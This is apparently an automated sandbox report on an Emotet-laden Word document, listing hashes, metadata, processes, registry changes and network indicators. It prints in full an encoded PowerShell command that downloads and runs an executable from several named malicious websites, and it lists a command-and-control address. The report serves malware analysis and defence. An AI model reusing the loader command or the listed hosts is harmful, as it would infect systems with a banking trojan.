analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Attachment-092019.doc

Full analysis: https://app.any.run/tasks/6d8ba3a2-79d6-4b27-aa0c-437a5ab20cbb
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 19, 2019, 10:10:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet
trojan
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: violet Place vertical, Subject: Consultant, Author: Mohammed Hintz, Comments: functionalities, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 08:35:00 2019, Last Saved Time/Date: Thu Sep 19 08:35:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

681A63D4FA3D6ED4FFE9911A1B27F2DC

SHA1:

48C4145A239522BD01AC22B253D479920B1E7C39

SHA256:

6FEF8784C06172D05979F764C7F602B271F218FF3C1BF38391666D79B1AA832C

SSDEEP:

6144:vCH72i0o89p8gh2UvtYeREBLkI07NSU4jUntATfDvXt:vCH72i0o89p8gh2UvtYeRgX07NSU4ee9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 208.exe (PID: 1920)
      • 208.exe (PID: 3120)
      • 208.exe (PID: 2404)
      • 208.exe (PID: 2068)
      • easywindow.exe (PID: 3792)
      • easywindow.exe (PID: 2904)
      • easywindow.exe (PID: 2796)
      • easywindow.exe (PID: 3684)
    • Emotet process was detected

      • 208.exe (PID: 2404)
    • EMOTET was detected

      • easywindow.exe (PID: 3684)
    • Changes the autorun value in the registry

      • easywindow.exe (PID: 3684)
    • Connects to CnC server

      • easywindow.exe (PID: 3684)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2480)
    • Creates files in the user directory

      • powershell.exe (PID: 2480)
    • Executed via WMI

      • powershell.exe (PID: 2480)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2480)
      • 208.exe (PID: 2404)
    • Starts itself from another location

      • 208.exe (PID: 2404)
    • Application launched itself

      • easywindow.exe (PID: 3792)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3648)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3648)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2480)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: violet Place vertical
Subject: Consultant
Author: Mohammed Hintz
Keywords: -
Comments: functionalities
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:19 07:35:00
ModifyDate: 2019:09:19 07:35:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Gislason and Sons
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Farrell
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 208.exe no specs 208.exe no specs 208.exe no specs #EMOTET 208.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3648"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Attachment-092019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2480powershell -encod JABSAE0AbwBqAGYAWABFAFUAPQAnAGgAdwBpAF8ATgAyAFIAQgAnADsAJABDAFkAWQBmADIAUgBRADkAIAA9ACAAJwAyADAAOAAnADsAJABXAGkAaABMAFgATwBsAD0AJwBZAHIAZABVAHEAWQBSACcAOwAkAHYAUwBfADAAUwBCAGIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMAWQBZAGYAMgBSAFEAOQArACcALgBlAHgAZQAnADsAJABmAE8AcgBOAHcARQBSAD0AJwBPAF8AXwBPAHYAWABIACcAOwAkAE0AagBfAHoAdwBqAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBCAEMATABpAEUAbgB0ADsAJAB2AG0AMwBQAFAATwA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAZQBmAG8AcgB0AHUAbgBhAHQAZQBuAHUAdAByAGkAdABpAG8AbgAuAGMAbwBtAC8AdgB1AHoAcAA0AG8AMgB2AGIALwBoADMALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHIAYQBuAGcAcgBlAGEAbABpAHQAeQAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwB2ADcAcgByADcALwBAAGgAdAB0AHAAcwA6AC8ALwBjAG8AZABlAG4AcABpAGMALgBjAG8AbQAvAHcAYQBuAGQAZQByAHYAbwBnAGUAbAAvADcAMABtAGoAYQA0AC8AQABoAHQAdABwADoALwAvAHAAaQBuAG0AbwB2AGEALgB4AHkAegAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB3AGkAZABzAHIAYQBxADQANgA4ADUALwBAAGgAdAB0AHAAcwA6AC8ALwBlAGMAYQBtAHAAdQBzAGsAYgBkAHMALgBjAG8AbQAvAHYAbgBnAHAALwB2ADQAMAA1AC8AJwAuACIAUwBgAHAAbABpAFQAIgAoACcAQAAnACkAOwAkAEYAVQBIAEkAZABtAGkAPQAnAFAASwBVADEAawBmAGgAbAAnADsAZgBvAHIAZQBhAGMAaAAoACQARQBqADgAdABwAGkAQgAgAGkAbgAgACQAdgBtADMAUABQAE8AKQB7AHQAcgB5AHsAJABNAGoAXwB6AHcAagAuACIARABPAHcATgBsAGAAbwBBAGQARgBJAGAAbABlACIAKAAkAEUAagA4AHQAcABpAEIALAAgACQAdgBTAF8AMABTAEIAYgApADsAJABMAHcAYwA1AGQAMgBUAHMAPQAnAHcARgBNAHcAdQBLACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAdgBTAF8AMABTAEIAYgApAC4AIgBsAEUAYABOAEcAVABIACIAIAAtAGcAZQAgADIAOAA5ADQANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAQQBgAFIAVAAiACgAJAB2AFMAXwAwAFMAQgBiACkAOwAkAG0ARgBwAFQASABfAHUAPQAnAFYAZgByAEsAMABPAHEAJwA7AGIAcgBlAGEAawA7ACQAVwBwAFMASwA1ADQATwA9ACcAegBqAEcAYQBEAEsAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcABqAGMAVQA2AHUAdwA9ACcASQBpAHcASAAwAEYAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1920"C:\Users\admin\208.exe" C:\Users\admin\208.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2068"C:\Users\admin\208.exe" C:\Users\admin\208.exe208.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3120--7522c4b8C:\Users\admin\208.exe208.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2404--7522c4b8C:\Users\admin\208.exe
208.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3792"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe208.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2796"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2904--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3684--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 765
Read events
1 273
Write events
487
Delete events
5

Modification events

(PID) Process:(3648) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:d`$
Value:
64602400400E0000010000000000000000000000
(PID) Process:(3648) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3648) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3648) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1328742430
(PID) Process:(3648) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1328742544
(PID) Process:(3648) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1328742545
(PID) Process:(3648) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
400E0000AED47B70D26ED50100000000
(PID) Process:(3648) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:-a$
Value:
2D612400400E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3648) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:-a$
Value:
2D612400400E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3648) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3648WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9C64.tmp.cvr
MD5:
SHA256:
3648WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE193719.wmfwmf
MD5:CE3EF45381D827D23D287AC544B62DF4
SHA256:F1E7ECDDD0669D79EF30DB37FD565EEA9E7317CF1685B7C6A7C58B7E80FDE0A4
3648WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:BC9B655AD54B0B824F4AC621D781085D
SHA256:ED43FAB52F56D2D6E7FB43A8B4E0FDDF1D0E7ACD909BFB41FCAA8DEBBB857DE4
3648WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$tachment-092019.docpgc
MD5:8FE7D96090B99D7B04EA03E2433B6643
SHA256:FD7B4ADA16E5A54B7E777520C11DBA48F5A43D852223CA79EC5C31C720279CFB
3648WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D8A3C78037662892E9FAF70E28BDC6D9
SHA256:2AFBB8A7DCB7B20E5167BA320E64EEAE43B40751E825F274A797DB8DE421D750
3648WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8D800F2.wmfwmf
MD5:C910D547CDB12F4185FD93C214BFCF60
SHA256:939C550745B57E4920C6349AD42E505A7BBAE9A715627523D3710884055DAE43
3648WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\60F9401C.wmfwmf
MD5:DDDE53CD307DDDDB80C50A103824BA85
SHA256:85BFC65C2123EA7F79C12C5847809F2270560CC4893896DCC403A085CF4A5068
3648WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BAFA784B.wmfwmf
MD5:95840E3973B8522B6C5BE720BF741A9A
SHA256:B7C35596D852DFCFBD2E8A4817EBE196F31224F4561D913563570B7B77B69C53
3648WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03C18F.wmfwmf
MD5:8706686C8F37C2536C6A1A12686B7273
SHA256:F7E26261F4E359E3F66108631E649DFAA10A17551FBDB17D5D87595825E83995
3648WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14ACC246.wmfwmf
MD5:9CD4F92AF225D2D585646598F5B2C881
SHA256:5B60314B658BE5222A1CD3BC5D9E9F0D79AD6D78BC1AEA5B1D67885583DB7302
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
3
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3684
easywindow.exe
POST
200
114.79.134.129:443
http://114.79.134.129:443/health/iab/
IN
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3684
easywindow.exe
114.79.134.129:443
D-Vois Broadband Pvt Ltd
IN
malicious
2480
powershell.exe
209.236.112.54:443
www.rangreality.com
Dallas Infrastructure Services, LLC
US
suspicious
2480
powershell.exe
45.76.184.98:80
thefortunatenutrition.com
Choopa, LLC
SG
suspicious

DNS requests

Domain
IP
Reputation
thefortunatenutrition.com
  • 45.76.184.98
malicious
dns.msftncsi.com
  • 131.107.255.255
shared
www.rangreality.com
  • 209.236.112.54
unknown

Threats

PID
Process
Class
Message
3684
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3684
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3684
easywindow.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
3 ETPRO signatures available at the full report
No debug info